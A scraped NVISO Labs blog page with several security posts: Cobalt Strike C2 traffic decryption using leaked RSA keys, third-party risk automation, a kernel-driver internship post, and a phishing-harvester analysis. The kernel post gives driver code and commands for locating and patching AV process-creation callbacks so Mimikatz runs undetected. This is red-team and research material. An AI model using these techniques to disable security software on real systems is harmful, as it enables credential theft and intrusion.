There are new articles available, click to refresh the page.
Yesterday — 27 October 2021NVISO Labs

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

27 October 2021 at 08:49

We decrypt Cobalt Strike traffic using one of 6 private keys we found.

In this blog post, we will analyze a Cobalt Strike infection by looking at a full packet capture that was taken during the infection. This analysis includes decryption of the C2 traffic.

If you haven’t already, we invite you to read part 1 first: Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1.

For this analysis, we are using capture file 2021-02-02-Hancitor-with-Ficker-Stealer-and-Cobalt-Strike-and-NetSupport-RAT.pcap.zip, this is one of the many malware traffic capture files that Brad Duncan shares on his web site Malware-Traffic-Analysis.net.

We start with a minimum of knowledge: the capture file contains encrypted HTTP traffic of a Cobalt Strike beacon communicating with its team server.

If you want to know more about Cobalt Strike and its components, we highly recommend the following blog post.

First step: we open the capture file with Wireshark, and look for downloads of a full beacon by stager shellcode.

Although beacons can come in many forms, we can identify 2 major categories:

  1. A small piece of shellcode (a couple of hundred bytes), aka the stager shellcode, that downloads the full beacon
  2. The full beacon: a PE file that can be reflectively loaded

In this first step, we search for signs of stager shellcode in the capture file: we do this with the following display filter: http.request.uri matches “/….$”.

Figure 1: packet capture for Cobalt Strike traffic

We have one hit. The path used in the GET request to download the full beacon, consists of 4 characters that satisfy a condition: the byte-value of the sum of the character values (aka checksum 8) is a known constant. We can check this with the tool metatool.py like this:

Figure 2: using metatool.py

More info on this checksum process can be found here.
The output of the tool shows that this is a valid path to download a 32-bit full beacon (CS x86).
The download of the full beacon is captured too:

Figure 3: full beacon download

And we can extract this download:

Figure 4: export HTTP objects
Figure 5: selecting download EbHm for saving
Figure 6: saving selected download to disk

Once the full beacon has been saved to disk as EbHm.vir, it can be analyzed with tool 1768.py. 1768.py is a tool that can decode/decrypt Cobalt Strike beacons, and extract their configuration. Cobalt Strike beacons have many configuration options: all these options are stored in an encoded and embedded table.

Here is the output of the analysis:

Figure 7: extracting beacon configuration

Let’s take a closer look at some of the options.

First of all, option 0x0000 tells us that this is an HTTP beacon: it communicates over HTTP.
It does this by connecting to 192.254.79[.]71 (option 0x0008) on port 8080 (option 0x0002).
GET requests use path /ptj (option 0x0008), and POST requests use path /submit.php (option 0x000a)
And important for our analysis: there is a known private key (Has known private key) for the public key used by this beacon (option 0x0007).

Thus, armed with this information, we know that the beacon will send GET requests to the team server, to obtain instructions. If the team server has commands to be executed by the beacon, it will reply with encrypted data to the GET request. And when the beacon has to send back output from its commands to the team server, it will use a POST request with encrypted data.

If the team server has no commands for the beacon, it will send no encrypted data. This does not necessarily mean that the reply to a GET request contains no data: it is possible for the operator, through profiles, to masquerade the communication. For example, that the encrypted data is inside a GIF file. But that is not the case with this beacon. We know this, because there are no so-called malleable C2 instructions in this profile: option 0x000b is equal to 0x00000004 -> this means no operations should be performed on the data prior to decryption (we will explain this in more detail in a later blog post).

Let’s create a display filter to view this C2 traffic: http and ip.addr == 192.254.79[.]71

Figure 8: full beacon download and HTTP requests with encrypted Cobalt Strike traffic

This displays all HTTP traffic to and from the team server. Remark that we already took a look at the first 2 packets in this view (packets 6034 and 6703): that’s the download of the beacon itself, and that communication is not encrypted. Hence, we will filter these packets out with the following display filter:

http and ip.addr == and frame.number > 6703

This gives us a list of GET requests with their reply. Remark that there’s a GET request every minute. That too is in the beacon configuration: 60.000 ms of sleep (option 0x0003) with 0% variation (aka jitter, option 0x0005).

Figure 9: HTTP requests with encrypted Cobalt Strike traffic

We will now follow the first HTTP stream:

Figure 10: following HTTP stream
Figure 11: first HTTP stream

This is a GET request for /ptj that receives a STATUS 200 reply with no data. This means that there are no commands from the team server for this beacon for now: the operator has not issued any commands at that point in the capture file.

Remark the Cookie header of the GET request. This looks like a BASE64 string: KN9zfIq31DBBdLtF4JUjmrhm0lRKkC/I/zAiJ+Xxjz787h9yh35cRjEnXJAwQcWP4chXobXT/E5YrZjgreeGTrORnj//A5iZw2TClEnt++gLMyMHwgjsnvg9czGx6Ekpz0L1uEfkVoo4MpQ0/kJk9myZagRrPrFWdE9U7BwCzlE=

That value is encrypted metadata that the beacon sends as a BASE64 string to the team server. This metadata is RSA encrypted with the public key inside the beacon configuration (option 0x0007), and the team server can decrypt this metadata because it has the private key. Remember that some private keys have been “leaked”, we discussed this in our first blog post in this series.

Our beacon analysis showed that this beacon uses a public key with a known private key. This means we can use tool cs-decrypt-metadata.py to decrypt the metadata (cookie) like this:

Figure 12: decrypting beacon metadata

We can see here the decrypted metadata. Very important to us, is the raw key: caeab4f452fe41182d504aa24966fbd0. We will use this key to decrypt traffic (the AES adn HMAC keys are derived from this raw key).

More metadata that we can find here is: the computername, the username, …

We will now follow the HTTP stream with packets 9379 and 9383: this is the first command send by the operator (team server) to the beacon:

Figure 13: HTTP stream with encrypted command

Here we can see that the reply contains 48 bytes of data (Content-length). That data is encrypted:

Figure 14: hexadecimal view of HTTP stream with encrypted command

Encrypted data like this, can be decrypted with tool cs-parse-http-traffic.py. Since the data is encrypted, we need to provide the raw key (option -r caeab4f452fe41182d504aa24966fbd0) and as the packet capture contains other traffic than pure Cobalt Strike C2 traffic, it is best to provide a display filter (option -Y http and ip.addr == and frame.number > 6703) so that the tool can ignore all HTTP traffic that is not C2 traffic.

This produces the following output:

Figure 15: decrypted commands and results

Now we can see that the encrypted data in packet 9383 is a sleep command, with a sleeptime of 100 ms and a jitter factor of 90%. This means that the operator instructed the beacon to beacon interactive.

Decrypted packet 9707 contains an unknown command (id 53), but when we look at packet 9723, we see a directory listing output: this is the output result of the unknown command 53 being send back to the team server (notice the POST url /submit.php). Thus it’s safe to assume that command 53 is a directory listing command.

There are many commands and results in this capture file that tool cs-parse-http-traffic.py can decrypt, too much to show here. But we invite you to reproduce the commands in this blog post, and review the output of the tool.

The last command in the capture file is a process listing command:

Figure 16: decrypted process listing command and result


Although the packet capture file we decrypted here was produced more than half a year ago by Brad Duncan by running a malicious Cobalt Strike beacon inside a sandbox, we can decrypt it today because the operators used a rogue Cobalt Strike package including a private key, that we recovered from VirusTotal.

Without this private key, we would not be able to decrypt the traffic.

The private key is not the only way to decrypt the traffic: if the AES key can be extracted from process memory, we can also decrypt traffic. We will cover this in an upcoming blog post.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Before yesterdayNVISO Labs

Automate, automate, automate: Three Ways to Increase the Value from Third Party Risk Management Efforts

26 October 2021 at 15:28

Third Party Risk Management (“TPRM”) efforts are often considered labour-intensive, with numerous tedious, manual steps. Often, an equal amount of effort is put into managing the process as is to focusing on risks. In order to avoid this, we’d like to share three ways in which we’ve been boosting our own TPRM efficiency – through automation of three crucial phases in the third party risk assessment process:

(1) during initiation (the business risk/criticality assessment),

(2) while performing your third party (due diligence) assessments and

(3) during the monitoring phase following the assessment.

This article elaborates further on the automation of the above.

  1. Automate the third-party criticality assessment

When you are applying a risk-based approach to your TPRM efforts, third party assessments are initiated with a criticality or business risk assessment using information from the business owner working with the third party. Most of our customers will document the criticality assessment in an Excel file with a lot of back-and-forth communication.

When reviewing the intake form, we realised that the intake could be distilled to a few multiple-choice questions, such as the highest category of data the third-party can access, the level of system access and so on. We created the possibility for the customer to conduct a short, simplified assessment through Microsoft Forms. This is easily available through one single link and avoids clutter (caused by different versions of Excel files, for example). In addition, through Microsoft Flow, the output from that Form is automatically grabbed and imported in a repository. Finally, we made sure an MS Planner Task is created for each new assessment which triggers the involvement of the security second line function.

Figure 1: Gathering the MS Forms output, assigning an assessment ID and storing the gathered criticality assessment input data.
Figure 2: Summarising the outcome in an email to security team (for validation) and creation of a task for follow-up through MS Planner.

This approach results in significant value increase because it can:

  • Give the business owner a more user-friendly GUI rather than an Excel sheet, which they are expected to complete.
  • Enable owners to initiate a third-party security assessment at any given time, without the initiation by second line.
  • Empower the second line to focus on understanding and challenging the provided input.
  • Improve administration aspects around the execution of the third-party security risk assessments are completed within a short time frame.

Do you want to take it to the next level? Integrate an automated approval through Power Automate for the security team.

The above case requires a low effort customisation to fully tailor this to your organisation and guarantees time efficiencies and better flexibility.

  1. Automate the execution of the assessments by leveraging tooling

You might still be wondering: how do we finally get rid of those Excel files to exchange with our third parties?  You could address this by using tooling throughout the assessment process. By leveraging these tools (such as Ceeyu, OneTrust Vendorpedia, Security Scorecard Atlas, Qualys SAQ, Prevalent and more) not only the tedious tasks of the criticality assessment, but also those of the consequential third party due diligence assessment, can be automated. Examples of tasks we have automated with such tooling include:

  • The exchange of the due diligence questionnaires.
  • The uploading and collecting of supporting evidence.
  • The tracking of the overall progress of the assessment (including the history of the review), and
  • Reporting of the assessment outcome and scoring (including comparison of vendors).

Again, significant value increase is the result and you can:

  • Reduce time-to-market: the administrative overhead per assessment, leading to a reduced average lead time of the assessment.
  • Identify bottlenecks: clearly pinpoint the bottleneck if the assessment does get stuck somewhere with a centralized overview of the actual status of the assessment.
  • Free up valuable time: allow the security team reviewing the provided input to focus their time on what really matters: reviewing the output.
  • Leverage reporting possibilities: minimise the effort in creating custom reports for management reporting using the cutting edge built-in reporting features.

Of course, this requires having the right tools at your disposition – however, implemented at scale, the efficiency and quality returns of the tools nearly always surpass the cost of such tooling. At NVISO for example, we’ve been able to decrease our nominal assessment cost by about 20% and our tool provides a portal to our customers that brings transparency and visibility on the handling of incoming TPRM requests.

  1. Automate the monitoring and follow-up on agreed actions by leveraging tooling

In order to maximise automation, you should also consider it for your monitoring actions. Very often assessments remain a point-in-time assessment (“snapshot”) which only paints a partial picture on how seriously your third parties take security. It is of equal importance to monitor their efforts to improve their security posture over time – i.e. the timely and effective implementation of your recommendations, and the evolution of their overall security posture. Automation can also play a major role in this process.

Here also, you would create value increase because you can:

  • Automate action plan monitoring: send automated reminders to the third parties in line with set due dates for identified follow-up actions.
  • Automate escalation: escalate to the business owner in case of overdue actions, potentially with different business rules depending on the business criticality of the supplier.
  • Free up valuable time: reducing manual interventions of your second line team helps focusing on where it really matters: is the identified action effectively addressed? Is the remediation effective in reducing the risk? We typically adopt a risk-driven, sample-based approach in verifying this.
  • Stay up to date: trigger automated reinitiation of assessments when they are due for a third party.

To facilitate this, you will again require the right tools at your disposition. A dedicated TPRM tool is a plus, although it’s perfectly feasible to also realise this through Microsoft 365 for example. This monitoring process is also something we offer as an option in our TPRM as a service solution.


To summarise: all of the above automation efforts (even through leveraging tools you might already have at hand) can significantly increase the value you get from your efforts in the Third Party Risk Management (TPRM) process. Customers, as well as third parties, see the benefits of these automation initiatives in the process: it reduces their involvement, it’s easier to track the various assessments and eventually it allows them to focus on the outcome of their TPRM efforts.

If you are looking at ways to boost your TPRM efforts and are seeking assistance in implementing this within your organisation, don’t hesitate to reach out to me through [email protected].

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.


3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

; evil.inf

Signature="$WINDOWS NT$"

DefaultDestDir = 12

1 = %DiskName%,,,""




ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.


Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.


Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.


Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;


	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

21 October 2021 at 08:59

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation we verified: are there cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys? This file is not part of a legitimate Cobalt Strike package, as it is generated at first time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key is extracted with known private key, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using option verbose, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

All aboard the internship – whispering past defenses and sailing into kernel space

13 October 2021 at 12:25

Previously, we have already published Sander’s (@cerbersec) internship testimony. Since this post does not really contain any juicy technical details and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey yet, on the contrary. In Part 2, Sander extended our BOF arsenal with additional process injections techniques and persistence. With all this functionality bundled in an Agressor Script, CobaltWispers was born.

We are considering to open source this little framework, but some final tweaks would be required first, as explained in the part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!

KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be. C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Phish, Phished, Phisher: A Quick Peek Inside a Telegram Harvester

4 October 2021 at 09:39

The tale is told by many: to access this document, “Sign in to your account” — During our daily Managed Detection and Response operations, NVISO handles hundreds of user-reported phishing threats which made it past commercial anti-phishing solutions. To ensure user safety, each report is carefully reviewed for Indicators of Compromise (IoCs) which are blocked and shared in threat intelligence feeds.

It is quite common to observe phishing pages on compromised hosts, legitimate services or, as will be the case for this blog post, directly delivered as an attachment. While it is trivial to get a phishing page, identifying a campaign’s extent usually requires global telemetry.

In one of the smaller campaigns we monitored last month (September 2021), the threat actor inadvertently exposed Telegram credentials to their harvester. This opportunity provided us some insight into their operations; a peek behind the curtains we wanted to share.

From Phish

The initial malicious attachment, reported by an end-user, is a typical phishing attachment file (.htm) delivered by a non-business email address (hotmail[.]co[.]uk), courtesy of “Onedrive for Business”. While we have observed some elaborate attempts in the past, it is quite obvious from a first glance that little effort has been put into this attempt.

Figure 1: A capture of the reported email with the spoofed recipient name, recipient and warning-banner redacted.

Upon opening the phishing attachment, the user would be presented with a pre-filled login form. The form impersonates the usual Microsoft login page in an attempt to grab valid credentials.

Figure 2: A capture of the Office 365 phishing attachment with the pre-filled credentials redacted.

If the user is successfully tricked into signing-in, a piece of in-line Javascript exfiltrates the credentials to a harvesting channel. This is performed through a simple GET request towards the api[.]telegram[.]org domain with the phished email address, password and IP included as parameters.

Figure 3: A capture of the credential harvesting Javascript code.

